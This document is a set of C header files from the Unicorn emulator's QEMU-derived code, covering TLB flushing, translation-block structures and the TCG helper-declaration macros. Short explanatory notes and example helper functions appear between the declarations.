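    tlb_flush_page(cpu, vaddr);
}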
/**
 * tlb_flush_page_by_mmuidx:
 * @cpu: CPU whose TLB should be flushed
 * @addr: virtual address of page to be flushed
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush one page from the TLB of the specified CPU, for the specified
 * MMU indexes.
 */
void tlb_flush_page_by_mmuidx(CPUState *cpu, target_ulong addr, uint16_t idxmap);
/**
 * tlb_flush_page_by_mmuidx_all_cpus:
 * @cpu: Originating CPU of the flush
 * @addr: virtual address of page to be flushed
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush one page from the TLB of all CPUs, for the specified
 * MMU indexes.
 */
void tlb_flush_page_by_mmuidx_all_cpus(CPUState *cpu, target_ulong addr, uint16_t idxmap);
/**
 * tlb_flush_page_by_mmuidx_all_cpus_synced:
 * @cpu: Originating CPU of the flush
 * @addr: virtual address of page to be flushed
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush one page from the TLB of all CPUs, for the specified MMU
 * indexes, like tlb_flush_page_by_mmuidx_all_cpus, except that the
 * source vCPU's work is scheduled as safe work, meaning all flushes
 * are complete once the source vCPU's safe work is complete. This
 * will depend on when the guest's translation ends the TB.
 */
void tlb_flush_page_by_mmuidx_all_cpus_synced(CPUState *cpu, target_ulong addr, uint16_t idxmap);
/**
 * tlb_flush_by_mmuidx:
 * @cpu: CPU whose TLB should be flushed
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush all entries from the TLB of the specified CPU, for the specified
 * MMU indexes.
 */
void tlb_flush_by_mmuidx(CPUState *cpu, uint16_t idxmap);
/**
 * tlb_flush_by_mmuidx_all_cpus:
 * @cpu: Originating CPU of the flush
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush all entries from all TLBs of all CPUs, for the specified
 * MMU indexes.
 */
void tlb_flush_by_mmuidx_all_cpus(CPUState *cpu, uint16_t idxmap);
/**
 * tlb_flush_by_mmuidx_all_cpus_synced:
 * @cpu: Originating CPU of the flush
 * @idxmap: bitmap of MMU indexes to flush
 *
 * Flush all entries from all TLBs of all CPUs, for the specified
 * MMU indexes, like tlb_flush_by_mmuidx_all_cpus, except that the
 * source vCPU's work is scheduled as safe work, meaning all flushes
 * are complete once the source vCPU's safe work is complete. This
 * will depend on when the guest's translation ends the TB.
 */
void tlb_flush_by_mmuidx_all_cpus_synced(CPUState *cpu, uint16_t idxmap);
/**
 * tlb_set_page_with_attrs:
 * @cpu: CPU to add this TLB entry for
 * @vaddr: virtual address of page to add entry for
 * @paddr: physical address of the page
 * @attrs: memory transaction attributes
 * @prot: access permissions (PAGE_READ/PAGE_WRITE/PAGE_EXEC bits)
 * @mmu_idx: MMU index to insert TLB entry for
 * @size: size of the page in bytes
 *
 * Add an entry to this CPU's TLB (a mapping from virtual address
 * @vaddr to physical address @paddr) with the specified memory
 * transaction attributes. This is generally called by the target CPU
 * specific code after it has been called through the tlb_fill()
 * entry point and performed a successful page table walk to find
 * the physical address and attributes for the virtual address
 * which provoked the TLB miss.
 *
 * At most one entry for a given virtual address is permitted. Only a
 * single TARGET_PAGE_SIZE region is mapped; the supplied @size is only
 * used by tlb_flush_page.
 */
void tlb_set_page_with_attrs(CPUState *cpu, target_ulong vaddr, hwaddr paddr, MemTxAttrs attrs, int prot, int mmu_idx, target_ulong size);
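To make the doc comment above concrete, here is a minimal sketch of the tail of a hypothetical target tlb_fill implementation. The function name is an assumption; the call itself follows the signature declared above, and TARGET_PAGE_MASK/TARGET_PAGE_SIZE and MEMTXATTRS_UNSPECIFIED are assumed from the usual CPU and memattrs headers.

/* Illustrative sketch only: after a successful page-table walk,
 * install the translation for the page containing vaddr. A real
 * tlb_fill would instead raise a guest fault on a failed walk.
 */
static void demo_tlb_fill_done(CPUState *cs, target_ulong vaddr,
                               hwaddr paddr, int prot, int mmu_idx)
{
    tlb_set_page_with_attrs(cs, vaddr & TARGET_PAGE_MASK,
                            paddr & TARGET_PAGE_MASK,
                            MEMTXATTRS_UNSPECIFIED, prot, mmu_idx,
                            TARGET_PAGE_SIZE);
}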
/* tlb_set_page:
 *
 * This function is equivalent to calling tlb_set_page_with_attrs()
 * with an @attrs argument of MEMTXATTRS_UNSPECIFIED. It's provided
 * as a convenience for CPUs which don't use memory transaction attributes.
 */
void tlb_set_page(CPUState *cpu, target_ulong vaddr, hwaddr paddr, int prot, int mmu_idx, target_ulong size);
void *probe_access(CPUArchState *env, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr);
static inline void *probe_write(CPUArchState *env, target_ulong addr, int size, int mmu_idx, uintptr_t retaddr)
{
    return probe_access(env, addr, size, MMU_DATA_STORE, mmu_idx, retaddr);
}
static inline void *probe_read(CPUArchState *env, target_ulong addr, int size, int mmu_idx, uintptr_t retaddr)
{
    return probe_access(env, addr, size, MMU_DATA_LOAD, mmu_idx, retaddr);
}
#define CODE_GEN_ALIGN 16 /* must be >= the size of an icache line */
/* Estimated block size for TB allocation. */
/* ??? The following is based on a 2015 survey of x86_64 host output.
   Better would seem to be some sort of dynamically sized TB array,
   adapting to the block sizes actually being produced. */
#define CODE_GEN_AVG_BLOCK_SIZE 400
/*
 * Translation Cache-related fields of a TB.
 * This struct exists just for convenience; we keep track of TB's in a binary
 * search tree, and the only fields needed to compare TB's in the tree are
 * @ptr and @size.
 * Note: the address of search data can be obtained by adding @size to @ptr.
 */
struct tb_tc {
    void *ptr;    /* pointer to the translated code */
    size_t size;
};
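The probe_* helpers above let a helper validate a guest access before performing it, so that any fault or watchpoint fires before the helper has mutated state. A hedged sketch, with a hypothetical helper name:

/* Illustrative sketch only: validate a 16-byte guest store up front,
 * then use the host pointer when the page is directly addressable.
 * probe_write() raises the guest fault itself on failure; it returns
 * NULL when the memory is not directly accessible (e.g. MMIO).
 */
void helper_demo_store16_probe(CPUArchState *env, target_ulong vaddr,
                               int mmu_idx)
{
    void *host = probe_write(env, vaddr, 16, mmu_idx, GETPC());
    if (host) {
        /* fault-free fast path: the 16 bytes are host-addressable */
        memset(host, 0, 16); /* assumes <string.h> via the usual osdep include */
    }
}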
struct TranslationBlock {
    target_ulong pc;        /* simulated PC corresponding to this block (EIP + CS base) */
    target_ulong cs_base;   /* CS base for this block */
    uint32_t flags;         /* flags defining in which context the code was generated */
    uint16_t size;          /* size of target code for this block (1 <= size <= TARGET_PAGE_SIZE) */
    uint16_t icount;
    uint32_t cflags;        /* compile flags */
#define CF_COUNT_MASK  0x00007fff
#define CF_LAST_IO     0x00008000 /* Last insn may be an IO access.  */
#define CF_NOCACHE     0x00010000 /* To be freed after execution */
#define CF_USE_ICOUNT  0x00020000
#define CF_INVALID     0x00040000 /* TB is stale. Set with @jmp_lock held */
#define CF_PARALLEL    0x00080000 /* Generate code for a parallel context */
#define CF_CLUSTER_MASK 0xff000000 /* Top 8 bits are cluster ID */
#define CF_CLUSTER_SHIFT 24
/* cflags' mask for hashing/comparison */
#define CF_HASH_MASK \
    (CF_COUNT_MASK | CF_LAST_IO | CF_USE_ICOUNT | CF_PARALLEL | CF_CLUSTER_MASK)
    /* Per-vCPU dynamic tracing state used to generate this TB */
    uint32_t trace_vcpu_dstate;
    struct tb_tc tc;
    /* original tb when cflags has CF_NOCACHE */
    struct TranslationBlock *orig_tb;
    /* first and second physical page containing code. The lower bit
       of the pointer tells the index in page_next[].
       The list is protected by the TB's page('s) lock(s) */
    uintptr_t page_next[2];
    tb_page_addr_t page_addr[2];
    /* The following data are used to directly call another TB from
     * the code of this one. This can be done either by emitting direct or
     * indirect native jump instructions. These jumps are reset so that the TB
     * just continues its execution. The TB can be linked to another one by
     * setting one of the jump targets (or patching the jump instruction). Only
     * two of such jumps are supported.
     */
    uint16_t jmp_reset_offset[2]; /* offset of original jump target */
#define TB_JMP_RESET_OFFSET_INVALID 0xffff /* indicates no jump generated */
    uintptr_t jmp_target_arg[2];  /* target address or offset */
    /*
     * Each TB has a NULL-terminated list (jmp_list_head) of incoming jumps.
     * Each TB can have two outgoing jumps, and therefore can participate
     * in two lists. The list entries are kept in jmp_list_next[2]. The least
     * significant bit (LSB) of the pointers in these lists is used to encode
     * which of the two list entries is to be used in the pointed TB.
     *
     * List traversals are protected by jmp_lock. The destination TB of each
     * outgoing jump is kept in jmp_dest[] so that the appropriate jmp_lock
     * can be acquired from any origin TB.
     *
     * jmp_dest[] are tagged pointers as well. The LSB is set when the TB is
     * being invalidated, so that no further outgoing jumps from it can be set.
     *
     * jmp_lock also protects the CF_INVALID cflag; a jump must not be chained
     * to a destination TB that has CF_INVALID set.
     */
    uintptr_t jmp_list_head;
    uintptr_t jmp_list_next[2];
    uintptr_t jmp_dest[2];
    uint32_t hash; // unicorn needs this hash to remove this TB from QHT cache
};
// extern bool parallel_cpus;
/* Hide the atomic_read to make code a little easier on the eyes */
static inline uint32_t tb_cflags(const TranslationBlock *tb)
{
    return tb->cflags;
}
/* current cflags for hashing/comparison */
static inline uint32_t curr_cflags(void)
{
    return 0;
}
/* TranslationBlock invalidate API */
void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr, MemTxAttrs attrs);
void tb_flush(CPUState *cpu);
void tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, tb_page_addr_t page_addr);
TranslationBlock *tb_htable_lookup(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, uint32_t cf_mask);
void tb_set_jmp_target(TranslationBlock *tb, int n, uintptr_t addr);
void tb_exec_lock(struct uc_struct*);
void tb_exec_unlock(struct uc_struct*);
/* GETPC is the true target of the return instruction that we'll execute.  */
#ifdef _MSC_VER
#include <intrin.h>
# define GETPC() (uintptr_t)_ReturnAddress()
#else
# define GETPC() \
    ((uintptr_t)__builtin_extract_return_addr(__builtin_return_address(0)))
#endif
/* The true return address will often point to a host insn that is part of
   the next translated guest insn.  Adjust the address backward to point to
   the middle of the call insn.  Subtracting one would do the job except for
   several compressed mode architectures (arm, mips) which set the low bit
   to indicate the compressed mode; subtracting two works around that.  It
   is also the case that there are no host ISAs that contain a call insn
   smaller than 4 bytes, so we don't worry about special-casing this.  */
#define GETPC_ADJ 2
#if defined(CONFIG_DEBUG_TCG)
void assert_no_pages_locked(void);
#else
static inline void assert_no_pages_locked(void)
{
}
#endif
/**
 * iotlb_to_section:
 * @cpu: CPU performing the access
 * @index: TCG CPU IOTLB entry
 *
 * Given a TCG CPU IOTLB entry, return the MemoryRegionSection that
 * it refers to. @index will have been initially created and returned
 * by memory_region_section_get_iotlb().
 */
struct MemoryRegionSection *iotlb_to_section(CPUState *cpu, hwaddr index, MemTxAttrs attrs);
static inline void mmap_lock(void) {}
static inline void mmap_unlock(void) {}
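A subtlety worth spelling out: GETPC() is only meaningful in the helper that generated code calls directly, because it captures that call's host return address. Capture it once at the top and pass it down; calling GETPC() from a sub-function would yield a host address that does not map back to the guest instruction. A minimal sketch with a hypothetical helper:

/* Illustrative sketch only: capture the retaddr once, reuse it for
 * every guest access the helper performs.
 */
uint64_t helper_demo_read_pair(CPUArchState *env, target_ulong vaddr)
{
    uintptr_t ra = GETPC();
    uint64_t lo = cpu_ldl_data_ra(env, vaddr, ra);
    uint64_t hi = cpu_ldl_data_ra(env, vaddr + 4, ra);
    return lo | (hi << 32);
}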
/**
 * get_page_addr_code() - full-system version
 * @env: CPUArchState
 * @addr: guest virtual address of guest code
 *
 * If we cannot translate and execute from the entire RAM page, or if
 * the region is not backed by RAM, returns -1. Otherwise, returns the
 * ram_addr_t corresponding to the guest code at @addr.
 *
 * Note: this function can trigger an exception.
 */
tb_page_addr_t get_page_addr_code(CPUArchState *env, target_ulong addr);
/**
 * get_page_addr_code_hostp() - full-system version
 * @env: CPUArchState
 * @addr: guest virtual address of guest code
 *
 * See get_page_addr_code() (full-system version) for documentation on the
 * return value.
 *
 * Sets *@hostp (when @hostp is non-NULL) as follows.
 * If the return value is -1, sets *@hostp to NULL. Otherwise, sets *@hostp
 * to the host address where @addr's content is kept.
 *
 * Note: this function can trigger an exception.
 */
tb_page_addr_t get_page_addr_code_hostp(CPUArchState *env, target_ulong addr, void **hostp);
void tlb_reset_dirty(CPUState *cpu, ram_addr_t start1, ram_addr_t length);
void tlb_reset_dirty_by_vaddr(CPUState *cpu, target_ulong start1, target_ulong length);
void tlb_set_dirty(CPUState *cpu, target_ulong vaddr);
/* exec.c */
void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr);
MemoryRegionSection *
address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr, hwaddr *xlat, hwaddr *plen, MemTxAttrs attrs, int *prot);
hwaddr memory_region_section_get_iotlb(CPUState *cpu, MemoryRegionSection *section);
#endif
unicorn-2.1.1/qemu/include/exec/gen-icount.h
#ifndef GEN_ICOUNT_H
#define GEN_ICOUNT_H
#include "qemu/timer.h"
/* Helpers for instruction counting code generation.  */
static inline void gen_io_start(TCGContext *tcg_ctx)
{
    TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 1);
    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env,
                   offsetof(ArchCPU, parent_obj.can_do_io) -
                   offsetof(ArchCPU, env));
    tcg_temp_free_i32(tcg_ctx, tmp);
}
/*
 * cpu->can_do_io is cleared automatically at the beginning of
 * each translation block.  The cost is minimal and only paid
 * for -icount, plus it would be very easy to forget doing it
 * in the translator.  Therefore, backends only need to call
 * gen_io_start.
 */
static inline void gen_io_end(TCGContext *tcg_ctx)
{
    TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 0);
    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env,
                   offsetof(ArchCPU, parent_obj.can_do_io) -
                   offsetof(ArchCPU, env));
    tcg_temp_free_i32(tcg_ctx, tmp);
}
static inline void gen_tb_start(TCGContext *tcg_ctx, TranslationBlock *tb)
{
    TCGv_i32 count;
    tcg_ctx->exitreq_label = gen_new_label(tcg_ctx);
    count = tcg_temp_new_i32(tcg_ctx);
    tcg_gen_ld_i32(tcg_ctx, count, tcg_ctx->cpu_env,
                   offsetof(ArchCPU, neg.icount_decr.u32) -
                   offsetof(ArchCPU, env));
    tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, count, 0, tcg_ctx->exitreq_label);
    tcg_temp_free_i32(tcg_ctx, count);
}
static inline void gen_tb_end(TCGContext *tcg_ctx, TranslationBlock *tb, int num_insns)
{
    if (tb_cflags(tb) & CF_USE_ICOUNT) {
        /* Update the num_insn immediate parameter now that we know
         * the actual insn count.  */
        tcg_set_insn_param(tcg_ctx->icount_start_insn, 1, num_insns);
    }
    gen_set_label(tcg_ctx, tcg_ctx->exitreq_label);
    tcg_gen_exit_tb(tcg_ctx, tb, TB_EXIT_REQUESTED);
}
#endif
unicorn-2.1.1/qemu/include/exec/helper-gen.h
/* Helper file for declaring TCG helper functions.
   This one expands generation functions for tcg opcodes.
*/ #ifndef HELPER_GEN_H #define HELPER_GEN_H #include "exec/helper-head.h" #define DEF_HELPER_FLAGS_0(name, flags, ret) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl0(ret)) \ { \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 0, NULL); \ } #define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1)) \ { \ TCGTemp *args[1] = { dh_arg(t1, 1) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 1, args); \ } #define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2)) \ { \ TCGTemp *args[2] = { dh_arg(t1, 1), dh_arg(t2, 2) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 2, args); \ } #define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3)) \ { \ TCGTemp *args[3] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 3, args); \ } #define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), \ dh_arg_decl(t3, 3), dh_arg_decl(t4, 4)) \ { \ TCGTemp *args[4] = { dh_arg(t1, 1), dh_arg(t2, 2), \ dh_arg(t3, 3), dh_arg(t4, 4) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 4, args); \ } #define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5)) \ { \ TCGTemp *args[5] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 5, args); \ } #define DEF_HELPER_FLAGS_6(name, flags, ret, t1, t2, t3, t4, t5, t6) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5), dh_arg_decl(t6, 6)) \ { \ TCGTemp *args[6] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5), dh_arg(t6, 6) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 6, args); \ } #define DEF_HELPER_FLAGS_7(name, flags, ret, t1, t2, t3, t4, t5, t6, t7)\ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5), dh_arg_decl(t6, 6), \ dh_arg_decl(t7, 7)) \ { \ TCGTemp *args[7] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5), dh_arg(t6, 6), \ dh_arg(t7, 7) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 7, args); \ } #include "helper.h" #include "accel/tcg/tcg-runtime.h" #undef DEF_HELPER_FLAGS_0 #undef DEF_HELPER_FLAGS_1 #undef DEF_HELPER_FLAGS_2 #undef DEF_HELPER_FLAGS_3 #undef DEF_HELPER_FLAGS_4 #undef DEF_HELPER_FLAGS_5 #undef DEF_HELPER_FLAGS_6 #undef DEF_HELPER_FLAGS_7 #undef GEN_HELPER #endif /* HELPER_GEN_H */ 
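To see what these macros buy a target, consider a hypothetical declaration DEF_HELPER_2(demo_add, i32, i32, i32) in a target's helper.h. Including this header expands it, after resolving the dh_* aliases, into roughly the following emitter (the helper name is an assumption for illustration; the shape of the expansion follows the macros above):

/* Illustrative sketch only: approximate expansion of
 *     DEF_HELPER_2(demo_add, i32, i32, i32)
 * via DEF_HELPER_FLAGS_2 above.
 */
static inline void gen_helper_demo_add(TCGContext *tcg_ctx, TCGv_i32 retval,
                                       TCGv_i32 arg1, TCGv_i32 arg2)
{
    TCGTemp *args[2] = { tcgv_i32_temp(tcg_ctx, arg1),
                         tcgv_i32_temp(tcg_ctx, arg2) };
    tcg_gen_callN(tcg_ctx, helper_demo_add, tcgv_i32_temp(tcg_ctx, retval),
                  2, args);
}

A translator then emits a runtime call to helper_demo_add simply by invoking gen_helper_demo_add() on its TCG temporaries.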
unicorn-2.1.1/qemu/include/exec/helper-head.h
/* Helper file for declaring TCG helper functions.
   Used by other helper files.

   Targets should use DEF_HELPER_N and DEF_HELPER_FLAGS_N to declare helper
   functions.  Names should be specified without the helper_ prefix, and
   the return and argument types specified.  3 basic types are understood
   (i32, i64 and ptr).  Additional aliases are provided for convenience and
   to match the types used by the C helper implementation.

   The target helper.h should be included in all files that use/define
   helper functions.  This will ensure that function prototypes are
   consistent.  In addition it should be included an extra two times in
   helper.c, defining:
    GEN_HELPER 1 to produce op generation functions (gen_helper_*)
    GEN_HELPER 2 to do runtime registration of helper functions.
 */
#ifndef EXEC_HELPER_HEAD_H
#define EXEC_HELPER_HEAD_H
#define HELPER(name) glue(helper_, name)
/* Some types that make sense in C, but not for TCG.  */
#define dh_alias_i32 i32
#define dh_alias_s32 i32
#define dh_alias_int i32
#define dh_alias_i64 i64
#define dh_alias_s64 i64
#define dh_alias_f16 i32
#define dh_alias_f32 i32
#define dh_alias_f64 i64
#define dh_alias_ptr ptr
#define dh_alias_cptr ptr
#define dh_alias_void void
#define dh_alias_noreturn noreturn
#define dh_alias(t) glue(dh_alias_, t)
#define dh_ctype_i32 uint32_t
#define dh_ctype_s32 int32_t
#define dh_ctype_int int
#define dh_ctype_i64 uint64_t
#define dh_ctype_s64 int64_t
#define dh_ctype_f16 uint32_t
#define dh_ctype_f32 float32
#define dh_ctype_f64 float64
#define dh_ctype_ptr void *
#define dh_ctype_cptr const void *
#define dh_ctype_void void
#define dh_ctype_noreturn void QEMU_NORETURN
#define dh_ctype(t) dh_ctype_##t
#ifdef NEED_CPU_H
# ifdef TARGET_LONG_BITS
#  if TARGET_LONG_BITS == 32
#   define dh_alias_tl i32
#  else
#   define dh_alias_tl i64
#  endif
# endif
# define dh_alias_env ptr
# define dh_ctype_tl target_ulong
# define dh_ctype_env CPUArchState *
#endif
/* We can't use glue() here because it falls foul of C preprocessor
   recursive expansion rules.
*/ #define dh_retvar_decl0_void void #define dh_retvar_decl0_noreturn void #define dh_retvar_decl0_i32 TCGv_i32 retval #define dh_retvar_decl0_i64 TCGv_i64 retval #define dh_retvar_decl0_ptr TCGv_ptr retval #define dh_retvar_decl0(t) glue(dh_retvar_decl0_, dh_alias(t)) #define dh_retvar_decl_void #define dh_retvar_decl_noreturn #define dh_retvar_decl_i32 TCGv_i32 retval, #define dh_retvar_decl_i64 TCGv_i64 retval, #define dh_retvar_decl_ptr TCGv_ptr retval, #define dh_retvar_decl(t) glue(dh_retvar_decl_, dh_alias(t)) #define dh_retvar_void NULL #define dh_retvar_noreturn NULL #define dh_retvar_i32 tcgv_i32_temp(tcg_ctx, retval) #define dh_retvar_i64 tcgv_i64_temp(tcg_ctx, retval) #define dh_retvar_ptr tcgv_ptr_temp(tcg_ctx, retval) #define dh_retvar(t) glue(dh_retvar_, dh_alias(t)) #define dh_is_64bit_void 0 #define dh_is_64bit_noreturn 0 #define dh_is_64bit_i32 0 #define dh_is_64bit_i64 1 #define dh_is_64bit_ptr (sizeof(void *) == 8) #define dh_is_64bit_cptr dh_is_64bit_ptr #define dh_is_64bit(t) glue(dh_is_64bit_, dh_alias(t)) #define dh_is_signed_void 0 #define dh_is_signed_noreturn 0 #define dh_is_signed_i32 0 #define dh_is_signed_s32 1 #define dh_is_signed_i64 0 #define dh_is_signed_s64 1 #define dh_is_signed_f16 0 #define dh_is_signed_f32 0 #define dh_is_signed_f64 0 #define dh_is_signed_tl 0 #define dh_is_signed_int 1 /* ??? This is highly specific to the host cpu. There are even special extension instructions that may be required, e.g. ia64's addp4. But for now we don't support any 64-bit targets with 32-bit pointers. */ #define dh_is_signed_ptr 0 #define dh_is_signed_cptr dh_is_signed_ptr #define dh_is_signed_env dh_is_signed_ptr #define dh_is_signed(t) dh_is_signed_##t #define dh_callflag_i32 0 #define dh_callflag_s32 0 #define dh_callflag_int 0 #define dh_callflag_i64 0 #define dh_callflag_s64 0 #define dh_callflag_f16 0 #define dh_callflag_f32 0 #define dh_callflag_f64 0 #define dh_callflag_ptr 0 #define dh_callflag_cptr dh_callflag_ptr #define dh_callflag_void 0 #define dh_callflag_noreturn TCG_CALL_NO_RETURN #define dh_callflag(t) glue(dh_callflag_, dh_alias(t)) #define dh_sizemask(t, n) \ ((dh_is_64bit(t) << (n*2)) | (dh_is_signed(t) << (n*2+1))) #define dh_arg(t, n) \ glue(glue(tcgv_, dh_alias(t)), _temp)(tcg_ctx, glue(arg, n)) #define dh_arg_decl(t, n) glue(TCGv_, dh_alias(t)) glue(arg, n) #define DEF_HELPER_0(name, ret) \ DEF_HELPER_FLAGS_0(name, 0, ret) #define DEF_HELPER_1(name, ret, t1) \ DEF_HELPER_FLAGS_1(name, 0, ret, t1) #define DEF_HELPER_2(name, ret, t1, t2) \ DEF_HELPER_FLAGS_2(name, 0, ret, t1, t2) #define DEF_HELPER_3(name, ret, t1, t2, t3) \ DEF_HELPER_FLAGS_3(name, 0, ret, t1, t2, t3) #define DEF_HELPER_4(name, ret, t1, t2, t3, t4) \ DEF_HELPER_FLAGS_4(name, 0, ret, t1, t2, t3, t4) #define DEF_HELPER_5(name, ret, t1, t2, t3, t4, t5) \ DEF_HELPER_FLAGS_5(name, 0, ret, t1, t2, t3, t4, t5) #define DEF_HELPER_6(name, ret, t1, t2, t3, t4, t5, t6) \ DEF_HELPER_FLAGS_6(name, 0, ret, t1, t2, t3, t4, t5, t6) #define DEF_HELPER_7(name, ret, t1, t2, t3, t4, t5, t6, t7) \ DEF_HELPER_FLAGS_7(name, 0, ret, t1, t2, t3, t4, t5, t6, t7) /* MAX_OPC_PARAM_IARGS must be set to n if last entry is DEF_HELPER_FLAGS_n. 
 */
#endif /* EXEC_HELPER_HEAD_H */
unicorn-2.1.1/qemu/include/exec/helper-proto.h
/* Helper file for declaring TCG helper functions.
   This one expands prototypes for the helper functions.  */
#ifndef HELPER_PROTO_H
#define HELPER_PROTO_H
#include "exec/helper-head.h"
#define DEF_HELPER_FLAGS_0(name, flags, ret) \
dh_ctype(ret) HELPER(name) (void);
#define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1));
#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2));
#define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3));
#define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \
                            dh_ctype(t4));
#define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \
                            dh_ctype(t4), dh_ctype(t5));
#define DEF_HELPER_FLAGS_6(name, flags, ret, t1, t2, t3, t4, t5, t6) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \
                            dh_ctype(t4), dh_ctype(t5), dh_ctype(t6));
#define DEF_HELPER_FLAGS_7(name, flags, ret, t1, t2, t3, t4, t5, t6, t7) \
dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \
                            dh_ctype(t4), dh_ctype(t5), dh_ctype(t6), \
                            dh_ctype(t7));
#include "helper.h"
#include "accel/tcg/tcg-runtime.h"
#undef DEF_HELPER_FLAGS_0
#undef DEF_HELPER_FLAGS_1
#undef DEF_HELPER_FLAGS_2
#undef DEF_HELPER_FLAGS_3
#undef DEF_HELPER_FLAGS_4
#undef DEF_HELPER_FLAGS_5
#undef DEF_HELPER_FLAGS_6
#undef DEF_HELPER_FLAGS_7
#endif /* HELPER_PROTO_H */
unicorn-2.1.1/qemu/include/exec/helper-tcg.h
/* Helper file for declaring TCG helper functions.
   This one defines data structures private to tcg.c.  */
#ifndef HELPER_TCG_H
#define HELPER_TCG_H
#include "exec/helper-head.h"
/* Need one more level of indirection before stringification
   to get all the macros expanded first.
 */
#define str(s) #s
#define DEF_HELPER_FLAGS_0(NAME, FLAGS, ret) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) },
#define DEF_HELPER_FLAGS_1(NAME, FLAGS, ret, t1) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) },
#define DEF_HELPER_FLAGS_2(NAME, FLAGS, ret, t1, t2) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) },
#define DEF_HELPER_FLAGS_3(NAME, FLAGS, ret, t1, t2, t3) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) },
#define DEF_HELPER_FLAGS_4(NAME, FLAGS, ret, t1, t2, t3, t4) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) },
